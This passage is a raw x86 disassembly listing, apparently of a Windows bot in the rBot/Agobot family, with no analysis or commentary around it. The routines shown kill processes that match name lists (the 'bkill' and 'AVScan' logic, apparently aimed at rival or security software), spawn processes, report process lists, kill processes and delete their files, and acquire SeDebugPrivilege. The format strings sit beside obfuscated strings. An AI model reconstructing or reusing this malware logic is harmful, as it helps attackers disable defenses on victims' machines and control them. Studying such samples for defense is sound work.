test eax, eax
pop ecx
jz short loc_41F267
and byte ptr [ebp+arg_0+3], 0
loc_41F267: ; CODE XREF: sub_41F0F5+16C�j
add edi, 4
cmp edi, 668h
jb short loc_41F231
xor edi, edi
loc_41F274: ; CODE XREF: sub_41F0F5+1B8�j
lea esi, off_448F80[edi]
lea eax, [ebp+var_1B0]
push dword ptr [esi]
push eax
call ebx ; dword_437178
test eax, eax
jnz short loc_41F28C
and byte ptr [ebp+arg_0+3], al
loc_41F28C: ; CODE XREF: sub_41F0F5+192�j
lea eax, [ebp+var_1B0]
push eax
push dword ptr [esi]
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz short loc_41F2A4
and byte ptr [ebp+arg_0+3], 0
loc_41F2A4: ; CODE XREF: sub_41F0F5+1A9�j
add edi, 4
cmp edi, 88h
jb short loc_41F274
xor edi, edi
loc_41F2B1: ; CODE XREF: sub_41F0F5+1F5�j
lea esi, off_449008[edi]
lea eax, [ebp+var_1B0]
push dword ptr [esi]
push eax
call ebx ; dword_437178
test eax, eax
jnz short loc_41F2C9
and byte ptr [ebp+arg_0+3], al
loc_41F2C9: ; CODE XREF: sub_41F0F5+1CF�j
lea eax, [ebp+var_1B0]
push eax
push dword ptr [esi]
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz short loc_41F2E1
and byte ptr [ebp+arg_0+3], 0
loc_41F2E1: ; CODE XREF: sub_41F0F5+1E6�j
add edi, 4
cmp edi, 0D0h
jb short loc_41F2B1
and [ebp+var_4], 0
loc_41F2F0: ; CODE XREF: sub_41F0F5+2EA�j
mov eax, [ebp+var_4]
push off_447E68[eax]
lea eax, [ebp+var_1B0]
push eax
call ebx ; dword_437178
test eax, eax
jnz short loc_41F35F
cmp [ebp+var_18], eax
jz short loc_41F32E
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSKillingS ; "%s Killing %s"
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 14h
loc_41F32E: ; CODE XREF: sub_41F0F5+214�j
sub esp, 128h
lea eax, [ebp+var_A8]
lea esi, [ebp+var_1D4]
push 4Ah
pop ecx
mov edi, esp
push eax
push [ebp+var_18]
rep movsd
push [ebp+var_20]
push [ebp+var_AC]
call sub_41EFEF
add esp, 138h
loc_41F35F: ; CODE XREF: sub_41F0F5+20F�j
lea eax, [ebp+var_1B0]
push eax
mov eax, [ebp+var_4]
push off_447E68[eax]
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz short loc_41F3D4
cmp [ebp+var_18], 0
jz short loc_41F3A3
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSMatchedAndKil ; "%s Matched and killing %s"
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 14h
loc_41F3A3: ; CODE XREF: sub_41F0F5+289�j
sub esp, 128h
lea eax, [ebp+var_A8]
lea esi, [ebp+var_1D4]
push 4Ah
pop ecx
mov edi, esp
push eax
push [ebp+var_18]
rep movsd
push [ebp+var_20]
push [ebp+var_AC]
call sub_41EFEF
add esp, 138h
loc_41F3D4: ; CODE XREF: sub_41F0F5+283�j
add [ebp+var_4], 4
cmp [ebp+var_4], 0AACh
jb loc_41F2F0
cmp byte ptr [ebp+arg_0+3], 0
jz loc_41F487
cmp [ebp+var_18], 0
jz short loc_41F418
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSRunningAvscan ; "%s Running AVScan on %s"
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 14h
loc_41F418: ; CODE XREF: sub_41F0F5+2FE�j
sub esp, 128h
lea eax, [ebp+var_A8]
lea esi, [ebp+var_1D4]
push 4Ah
pop ecx
mov edi, esp
push offset byte_4FFFFF
push 400000h
push eax
push [ebp+var_18]
rep movsd
push [ebp+var_20]
push [ebp+var_AC]
call sub_41EE89
add esp, 18h
lea eax, [ebp+var_A8]
lea esi, [ebp+var_1D4]
push 4Ah
pop ecx
mov edi, esp
push 1FFFFFh
push 100000h
push eax
push [ebp+var_18]
rep movsd
push [ebp+var_20]
push [ebp+var_AC]
call sub_41EE89
add esp, 140h
jmp short loc_41F48B
; ---------------------------------------------------------------------------
loc_41F487: ; CODE XREF: sub_41F0F5+2F4�j
mov byte ptr [ebp+arg_0+3], 1
loc_41F48B: ; CODE XREF: sub_41F0F5+390�j
lea eax, [ebp+var_1D4]
push eax
push [ebp+var_C]
call sub_4290B2 ; Process32Next
loc_41F49A: ; CODE XREF: sub_41F0F5+90�j
test eax, eax
jnz loc_41F18A
push [ebp+var_C]
call dword_437044 ; CloseHandle
call sub_42BF90
push [ebp+var_28]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
loc_41F4C1: ; CODE XREF: sub_41F0F5+106�j
cmp [ebp+var_18], 0
jz short loc_41F4EA
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSBkillShutdown ; "%s bkill shutdown for wride."
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 14h
loc_41F4EA: ; CODE XREF: sub_41F0F5+3D0�j
push [ebp+var_28]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
loc_41F4FB: ; CODE XREF: sub_41F0F5+136�j
cmp [ebp+var_18], edi
jz short loc_41F523
lea eax, [ebp+var_1B0]
push eax
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_A8]
push offset aSBkillShutdown ; "%s bkill shutdown for wride."
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 14h
loc_41F523: ; CODE XREF: sub_41F0F5+409�j
push [ebp+var_28]
call sub_423623
pop ecx
push edi
call dword_437174 ; ExitThread
sub_41F0F5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F533 proc near ; DATA XREF: sub_40A9FE+210E�o
var_418 = byte ptr -418h
var_314 = byte ptr -314h
var_29C = byte ptr -29Ch
var_198 = byte ptr -198h
var_120 = dword ptr -120h
var_F4 = dword ptr -0F4h
var_F0 = word ptr -0F0h
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 418h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_DC]
rep movsd
xor edi, edi
push [ebp+var_54]
inc edi
mov esi, [ebp+var_48]
mov [eax+0BCh], edi
mov eax, [ebp+var_DC]
mov [ebp+arg_0], eax
mov eax, [ebp+var_44]
mov [ebp+var_18], eax
lea eax, [ebp+var_29C]
push eax
call dword_4370B4 ; lstrcpyA
lea eax, [ebp+var_29C]
push 104h
push eax
lea eax, [ebp+var_418]
push eax
call sub_429D10
add esp, 0Ch
lea eax, [ebp+var_418]
push eax
call dword_456EAC ; PathRemoveFileSpecA
test eax, eax
jnz short loc_41F607
cmp [ebp+var_28], eax
mov ebx, dword_437170
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
jnz short loc_41F5DC
cmp [ebp+var_24], eax
jnz short loc_41F5E6
call ebx ; dword_437170
push eax
push edi
push esi
lea eax, [ebp+var_D8]
push offset aSCouldnTPars_0 ; "%s Couldn't parse path, %s <%d>"
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 18h
loc_41F5DC: ; CODE XREF: sub_41F533+86�j
cmp [ebp+var_24], 0
jz loc_41F6E1
loc_41F5E6: ; CODE XREF: sub_41F533+8B�j
call ebx ; dword_437170
push eax
push edi
push esi
lea eax, [ebp+var_D8]
push offset aSCouldnTPars_0 ; "%s Couldn't parse path, %s <%d>"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
jmp loc_41F6E1
; ---------------------------------------------------------------------------
loc_41F607: ; CODE XREF: sub_41F533+71�j
xor ebx, ebx
push 44h
lea eax, [ebp+var_120]
push ebx
push eax
call sub_429760
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_429760
add esp, 18h
lea eax, [ebp+var_14]
neg esi
push eax
lea eax, [ebp+var_120]
push eax
lea eax, [ebp+var_418]
push eax
push ebx
sbb esi, esi
push ebx
push ebx
and esi, 0FFFFFFFBh
push ebx
lea eax, [ebp+var_29C]
push ebx
add esi, 5
push eax
push ebx
mov [ebp+var_120], 44h
mov [ebp+var_F4], edi
mov [ebp+var_F0], si
call dword_4370D8 ; CreateProcessA
test eax, eax
jnz short loc_41F6E9
cmp [ebp+var_28], ebx
mov ebx, dword_437170
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
jnz short loc_41F6B3
cmp [ebp+var_24], eax
jnz short loc_41F6B9
call ebx ; dword_437170
push eax
lea eax, [ebp+var_29C]
push edi
push eax
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push esi
lea eax, [ebp+var_D8]
push offset aSSToCreatePr_0 ; "%s %s to create proc: \"%s\", %s: <%d>"
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 20h
loc_41F6B3: ; CODE XREF: sub_41F533+151�j
cmp [ebp+var_24], 0
jz short loc_41F6E1
loc_41F6B9: ; CODE XREF: sub_41F533+156�j
call ebx ; dword_437170
push eax
lea eax, [ebp+var_29C]
push edi
push eax
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push esi
lea eax, [ebp+var_D8]
push offset aSSToCreatePr_0 ; "%s %s to create proc: \"%s\", %s: <%d>"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 20h
loc_41F6E1: ; CODE XREF: sub_41F533+AD�j
; sub_41F533+CF�j ...
xor eax, eax
inc eax
jmp loc_41F86F
; ---------------------------------------------------------------------------
loc_41F6E9: ; CODE XREF: sub_41F533+13C�j
mov edi, dword_437188
call edi ; dword_437188
cmp [ebp+var_28], 0
mov [ebp+var_4], eax
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
mov ebx, offset aSCreatedProcSP ; "%s Created proc: \"%s\", PID: <%d>"
jnz short loc_41F728
cmp [ebp+var_24], 0
jnz short loc_41F72E
push [ebp+var_C]
lea eax, [ebp+var_29C]
push eax
push esi
lea eax, [ebp+var_D8]
push ebx
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 18h
loc_41F728: ; CODE XREF: sub_41F533+1CF�j
cmp [ebp+var_24], 0
jz short loc_41F74C
loc_41F72E: ; CODE XREF: sub_41F533+1D5�j
push [ebp+var_C]
lea eax, [ebp+var_29C]
push eax
push esi
lea eax, [ebp+var_D8]
push ebx
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
loc_41F74C: ; CODE XREF: sub_41F533+1F9�j
cmp [ebp+var_28], 0
jnz loc_41F848
cmp [ebp+var_18], 0
jz loc_41F848
push 0FFFFFFFFh
push [ebp+var_14]
call dword_43707C ; WaitForSingleObject
call edi ; dword_437188
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
push 3Ch
div ecx
xor edx, edx
mov ecx, 15180h
pop edi
and [ebp+var_198], 0
div ecx
mov ecx, 0E10h
mov eax, edx
xor edx, edx
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div edi
mov edi, dword_437090
test ecx, ecx
mov ebx, edx
mov [ebp+var_4], eax
jbe short loc_41F7E3
cmp ecx, 1
mov eax, offset aHour ; " hour"
jz short loc_41F7BD
mov eax, offset aHours ; " hours"
loc_41F7BD: ; CODE XREF: sub_41F533+283�j
push eax
push ecx
lea eax, [ebp+var_314]
push offset aDS ; " %d%s"
push eax
call sub_429B03
add esp, 10h
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_198]
push eax
call edi ; dword_437090
loc_41F7E3: ; CODE XREF: sub_41F533+279�j
push ebx
lea eax, [ebp+var_314]
push [ebp+var_4]
push offset a_2d_2d ; " %.2d:%.2d"
push eax
call sub_429B03
add esp, 10h
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_198]
push eax
call edi ; dword_437090
lea eax, [ebp+var_198]
cmp [ebp+var_24], 0
push eax
lea eax, [ebp+var_29C]
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push eax
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
lea eax, [ebp+var_D8]
push esi
push offset aSProcsSSTotalS ; "%s Procs %s: \"%s\", Total %s Time: %s."
push eax
push [ebp+arg_0]
jnz short loc_41F840
call sub_41CE4A
jmp short loc_41F845
; ---------------------------------------------------------------------------
loc_41F840: ; CODE XREF: sub_41F533+304�j
call sub_41CDD4
loc_41F845: ; CODE XREF: sub_41F533+30B�j
add esp, 20h
loc_41F848: ; CODE XREF: sub_41F533+21D�j
; sub_41F533+227�j
cmp [ebp+var_14], 0
mov esi, dword_437044
jz short loc_41F859
push [ebp+var_14]
call esi ; dword_437044
loc_41F859: ; CODE XREF: sub_41F533+31F�j
cmp [ebp+var_10], 0
jz short loc_41F864
push [ebp+var_10]
call esi ; dword_437044
loc_41F864: ; CODE XREF: sub_41F533+32A�j
push [ebp+var_58]
call sub_423623
pop ecx
xor eax, eax
loc_41F86F: ; CODE XREF: sub_41F533+1B1�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_41F533 endp
; =============== S U B R O U T I N E =======================================
sub_41F876 proc near ; DATA XREF: sub_40A9FE+1FD6�o
mov eax, offset loc_436654
call sub_42B7CC
mov eax, 2AF8h
call sub_429B60
mov eax, [ebp+8]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp-0E0h]
rep movsd
mov edi, [ebp-0E0h]
xor esi, esi
xor ebx, ebx
inc esi
cmp [ebp-4Ch], ebx
mov [eax+0BCh], esi
mov [ebp+8], edi
jz loc_41FA40
mov al, [ebp+0Bh]
push ebx
push ebx
lea ecx, [ebp-1Ch]
mov [ebp-1Ch], al
call sub_4202E3
mov [ebp-18h], eax
mov [ebp-14h], ebx
push dword ptr [ebp-54h]
lea eax, [ebp-1Ch]
mov [ebp-4], ebx
push eax
call sub_41FC58
pop ecx
test al, al
pop ecx
jz loc_41F9DF
cmp [ebp-28h], ebx
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp-0DCh]
push esi
push offset aSProcsList ; "%s Procs List:"
push eax
push edi
jnz short loc_41F908
call sub_41CE4A
jmp short loc_41F90D
; ---------------------------------------------------------------------------
loc_41F908: ; CODE XREF: sub_41F876+89�j
call sub_41CDD4
loc_41F90D: ; CODE XREF: sub_41F876+90�j
add esp, 10h
cmp [ebp-30h], ebx
mov edi, offset aPidAMemoryUsag ; " PID - Memory Usage - Process"
jz short loc_41F932
cmp [ebp-28h], ebx
jnz short loc_41F937
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CE4A
add esp, 0Ch
loc_41F932: ; CODE XREF: sub_41F876+A2�j
cmp [ebp-28h], ebx
jz short loc_41F94A
loc_41F937: ; CODE XREF: sub_41F876+A7�j
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CDD4
add esp, 0Ch
loc_41F94A: ; CODE XREF: sub_41F876+BF�j
mov eax, [ebp-18h]
mov edi, [eax]
cmp edi, eax
jz short loc_41F9B9
loc_41F953: ; CODE XREF: sub_41F876+13F�j
mov eax, [edi+108h]
lea ebx, [edi+10Ch]
push offset aK ; " K"
push ebx
mov [ebp-10h], eax
call dword_437090 ; lstrcatA
lea eax, [edi+8]
push eax
push ebx
push dword ptr [ebp-10h]
lea eax, [ebp-2B04h]
push offset a6d10sS ; " %-6d- %-10s- \"%s\""
push eax
call sub_429B03
add esp, 14h
cmp dword ptr [ebp-28h], 0
lea eax, [ebp-2B04h]
push eax
lea eax, [ebp-0DCh]
push eax
push dword ptr [ebp+8]
jnz short loc_41F9A8
call sub_41CE4A
jmp short loc_41F9AD
; ---------------------------------------------------------------------------
loc_41F9A8: ; CODE XREF: sub_41F876+129�j
call sub_41CDD4
loc_41F9AD: ; CODE XREF: sub_41F876+130�j
mov edi, [edi]
add esp, 0Ch
cmp edi, [ebp-18h]
jnz short loc_41F953
xor ebx, ebx
loc_41F9B9: ; CODE XREF: sub_41F876+DB�j
cmp [ebp-28h], ebx
lea eax, [ebp-0DCh]
push esi
push offset aSEndOfList ; "%s End of list"
push eax
push dword ptr [ebp+8]
jnz short loc_41F9D8
call sub_41CE4A
loc_41F9D3: ; CODE XREF: sub_41F876+167�j
add esp, 10h
jmp short loc_41FA2F
; ---------------------------------------------------------------------------
loc_41F9D8: ; CODE XREF: sub_41F876+156�j
call sub_41CDD4
jmp short loc_41F9D3
; ---------------------------------------------------------------------------
loc_41F9DF: ; CODE XREF: sub_41F876+6D�j
cmp [ebp-28h], ebx
jnz short loc_41FA09
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp-0DCh]
push offset aSUnableToListP ; "%s Unable to list procs, %s: <%d>"
push eax
push edi
call sub_41CE4A
jmp short loc_41FA2C
; ---------------------------------------------------------------------------
loc_41FA09: ; CODE XREF: sub_41F876+16C�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp-0DCh]
push offset aSUnableToListP ; "%s Unable to list procs, %s: <%d>"
push eax
push edi
call sub_41CDD4
loc_41FA2C: ; CODE XREF: sub_41F876+191�j
add esp, 18h
loc_41FA2F: ; CODE XREF: sub_41F876+160�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-1Ch]
call sub_420245
jmp loc_41FC2D
; ---------------------------------------------------------------------------
loc_41FA40: ; CODE XREF: sub_41F876+3E�j
cmp [ebp-48h], ebx
jz loc_41FC2D
cmp [ebp-44h], ebx
jnz loc_41FB28
lea eax, [ebp-0F0h]
push eax
push dword ptr [ebp-58h]
call sub_41FE3F
pop ecx
test al, al
pop ecx
jz short loc_41FAAE
cmp [ebp-2Ch], ebx
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
mov edi, offset aSProSKilledTot ; "%s Pro \"%s\" killed,total: <%s>"
jnz short loc_41FA99
cmp [ebp-28h], ebx
jnz short loc_41FAA2
lea eax, [ebp-0F0h]
push eax
lea eax, [ebp-0DCh]
push dword ptr [ebp-58h]
push esi
push edi
push eax
push dword ptr [ebp+8]
call sub_41CE4A
add esp, 18h
loc_41FA99: ; CODE XREF: sub_41F876+1FE�j
cmp [ebp-28h], ebx
jz loc_41FC2D
loc_41FAA2: ; CODE XREF: sub_41F876+203�j
lea eax, [ebp-0F0h]
push eax
push dword ptr [ebp-58h]
jmp short loc_41FB05
; ---------------------------------------------------------------------------
loc_41FAAE: ; CODE XREF: sub_41F876+1EF�j
push dword ptr [ebp-58h]
call sub_42A100
push eax
call sub_420105
pop ecx
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
test eax, eax
pop ecx
jz short loc_41FB1E
mov edi, offset aSPidIKilled ; "%s PID \"%i\" killed"
loc_41FACC: ; CODE XREF: sub_41F876+3DD�j
cmp [ebp-2Ch], ebx
jnz short loc_41FAF3
cmp [ebp-28h], ebx
jnz short loc_41FAFC
push dword ptr [ebp-58h]
call sub_42A100
push eax
push esi
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CE4A
add esp, 18h
loc_41FAF3: ; CODE XREF: sub_41F876+259�j
cmp [ebp-28h], ebx
jz loc_41FC2D
loc_41FAFC: ; CODE XREF: sub_41F876+25E�j
push dword ptr [ebp-58h]
call sub_42A100
push eax
loc_41FB05: ; CODE XREF: sub_41F876+236�j
push esi
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CDD4
add esp, 18h
jmp loc_41FC2D
; ---------------------------------------------------------------------------
loc_41FB1E: ; CODE XREF: sub_41F876+24F�j
mov edi, offset aSFailedToKillP ; "%s Failed to kill proc"
jmp loc_41FBF6
; ---------------------------------------------------------------------------
loc_41FB28: ; CODE XREF: sub_41F876+1D6�j
lea eax, [ebp-1F4h]
push eax
push dword ptr [ebp-58h]
call sub_42A100
pop ecx
push eax
call sub_42015A
push eax
lea eax, [ebp-1F4h]
push offset aS_5 ; "%s"
push eax
call sub_429B03
lea eax, [ebp-3F4h]
push eax
lea eax, [ebp-2F4h]
push eax
push ebx
lea eax, [ebp-1F4h]
push ebx
push eax
call sub_42BF95
add esp, 28h
lea eax, [ebp-3F4h]
push eax
lea eax, [ebp-2F4h]
push eax
call dword_437090 ; lstrcatA
xor edi, edi
mov [ebp-10h], ebx
loc_41FB88: ; CODE XREF: sub_41F876+374�j
push dword ptr [ebp-58h]
call sub_42A100
push eax
call sub_420105
pop ecx
test eax, eax
pop ecx
jz short loc_41FB9E
mov edi, esi
loc_41FB9E: ; CODE XREF: sub_41F876+324�j
lea eax, [ebp-1F4h]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
lea eax, [ebp-1F4h]
push eax
call dword_437060 ; DeleteFileA
test eax, eax
jnz loc_41FC49
cmp edi, ebx
jz short loc_41FBD8
lea eax, [ebp-2F4h]
push ebx
push eax
call sub_41FE3F
pop ecx
pop ecx
loc_41FBD8: ; CODE XREF: sub_41F876+351�j
push 3E8h
call dword_437190 ; Sleep
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-10h], 5
jl short loc_41FB88
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
mov edi, offset aSFailedToKillA ; "%s Failed to kill and erase proc"
loc_41FBF6: ; CODE XREF: sub_41F876+2AD�j
cmp [ebp-2Ch], ebx
jnz short loc_41FC14
cmp [ebp-28h], ebx
jnz short loc_41FC19
push esi
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CE4A
add esp, 10h
loc_41FC14: ; CODE XREF: sub_41F876+383�j
cmp [ebp-28h], ebx
jz short loc_41FC2D
loc_41FC19: ; CODE XREF: sub_41F876+388�j
push esi
lea eax, [ebp-0DCh]
push edi
push eax
push dword ptr [ebp+8]
call sub_41CDD4
add esp, 10h
loc_41FC2D: ; CODE XREF: sub_41F876+1C5�j
; sub_41F876+1CD�j ...
push dword ptr [ebp-5Ch]
call sub_423623
pop ecx
pop edi
mov ecx, [ebp-0Ch]
pop esi
xor eax, eax
pop ebx
mov large fs:0, ecx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41FC49: ; CODE XREF: sub_41F876+349�j
mov esi, offset aAl_N0kenp20 ; "Al./N0Kenp20"
mov edi, offset aSPidIKilledAnd ; "%s PID \"%i\" killed and deleted"
jmp loc_41FACC
sub_41F876 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FC58 proc near ; CODE XREF: sub_41F876+64�p
var_15CC = byte ptr -15CCh
var_5CC = byte ptr -5CCh
var_3CC = byte ptr -3CCh
var_2CC = byte ptr -2CCh
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_44 = byte ptr -44h
var_38 = dword ptr -38h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 15CCh
call sub_429B60
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_15CC]
push 1000h
push eax
call dword_456F30
test eax, eax
jnz short loc_41FC83
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41FC83: ; CODE XREF: sub_41FC58+25�j
mov eax, [ebp+var_8]
push edi
shr eax, 2
mov [ebp+var_10], eax
mov eax, dword_4473F8
push 3Fh
mov [ebp+var_148], eax
mov eax, dword_4473FC
pop ecx
push 0
mov [ebp+var_144], eax
pop eax
lea edi, [ebp+var_140]
rep stosd
mov [ebp+var_4], eax
jz loc_41FE3A
push ebx
push esi
mov ebx, offset aS_5 ; "%s"
loc_41FCC1: ; CODE XREF: sub_41FC58+1DA�j
mov eax, [ebp+var_4]
lea esi, [ebp+eax*4+var_15CC]
push dword ptr [esi]
push 0
push 410h
call dword_437114 ; OpenProcess
mov edi, eax
test edi, edi
jz loc_41FE29
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push 4
push eax
push edi
call dword_456EEC
test eax, eax
jz loc_41FE22
lea eax, [ebp+var_148]
push 104h
push eax
push [ebp+var_C]
push edi
call dword_456EE4
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_2CC]
push ebx
push eax
call sub_429B03
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_1CC], eax
lea eax, [ebp+var_44]
push 28h
push eax
push edi
call dword_456FA0
test eax, eax
jz short loc_41FD69
mov eax, [ebp+var_38]
push 0
shr eax, 0Ah
push eax
call sub_427E4F
push eax
push ebx
lea eax, [ebp+var_1C8]
push 80h
push eax
call sub_429BBE
add esp, 18h
jmp short loc_41FD8E
; ---------------------------------------------------------------------------
loc_41FD69: ; CODE XREF: sub_41FC58+E9�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aSD_2 ; "%s: <%d>"
lea eax, [ebp+var_1C8]
push 80h
push eax
call sub_429BBE
add esp, 14h
loc_41FD8E: ; CODE XREF: sub_41FC58+10F�j
xor eax, eax
cmp [ebp+arg_4], eax
jz short loc_41FE0B
lea ecx, [ebp+var_3CC]
push ecx
lea ecx, [ebp+var_5CC]
push ecx
push eax
push eax
lea eax, [ebp+var_2CC]
push eax
call sub_42BF95
add esp, 14h
lea eax, [ebp+var_3CC]
push eax
lea eax, [ebp+var_5CC]
push eax
call dword_437090 ; lstrcatA
lea eax, [ebp+var_5CC]
push eax
push [ebp+arg_4]
push offset aSS_4 ; "%s / %s\n"
push offset dword_450F00
call sub_42C0DC
add esp, 10h
lea eax, [ebp+var_5CC]
push eax
push [ebp+arg_4]
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_41FE22
mov ecx, [ebp+arg_0]
lea edx, [ebp+var_2CC]
push edx
mov eax, [ecx+4]
push eax
lea eax, [ebp+var_18]
jmp short loc_41FE1C
; ---------------------------------------------------------------------------
loc_41FE0B: ; CODE XREF: sub_41FC58+13B�j
mov ecx, [ebp+arg_0]
lea edx, [ebp+var_2CC]
push edx
mov eax, [ecx+4]
push eax
lea eax, [ebp+var_14]
loc_41FE1C: ; CODE XREF: sub_41FC58+1B1�j
push eax
call sub_420270
loc_41FE22: ; CODE XREF: sub_41FC58+9F�j
; sub_41FC58+19E�j
push edi
call dword_437044 ; CloseHandle
loc_41FE29: ; CODE XREF: sub_41FC58+86�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jb loc_41FCC1
pop esi
pop ebx
loc_41FE3A: ; CODE XREF: sub_41FC58+5C�j
mov al, 1
pop edi
leave
retn
sub_41FC58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FE3F proc near ; CODE XREF: sub_40A9FE+3CE�p
; sub_40A9FE+837F�p ...
var_1148 = dword ptr -1148h
var_148 = byte ptr -148h
var_44 = byte ptr -44h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1148h
call sub_429B60
push ebx
push esi
push 10h
lea eax, [ebp+var_8]
pop esi
xor ebx, ebx
push eax
push ebx
push 28h
mov [ebp+var_1], bl
mov [ebp+var_1C], esi
call dword_437124 ; GetCurrentThread
push eax
call dword_456E48 ; OpenThreadToken
test eax, eax
jnz short loc_41FE8B
lea eax, [ebp+var_8]
push eax
push 28h
call dword_43704C ; GetCurrentProcess
push eax
call dword_456F18 ; OpenProcessToken
test eax, eax
jnz short loc_41FE8B
mov [ebp+var_8], ebx
loc_41FE8B: ; CODE XREF: sub_41FE3F+30�j
; sub_41FE3F+47�j
cmp [ebp+var_8], ebx
jz short loc_41FEE2
lea eax, [ebp+var_30]
mov [ebp+var_34], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push ebx
mov [ebp+var_28], 2
call dword_456EDC ; LookupPrivilegeValueA
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_34]
push esi
push eax
push ebx
push [ebp+var_8]
call dword_456FB4 ; AdjustTokenPrivileges
test eax, eax
jz short loc_41FED6
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 514h
jnz short loc_41FEE2
loc_41FED6: ; CODE XREF: sub_41FE3F+88�j
push [ebp+var_8]
call dword_437044 ; CloseHandle
mov [ebp+var_8], ebx
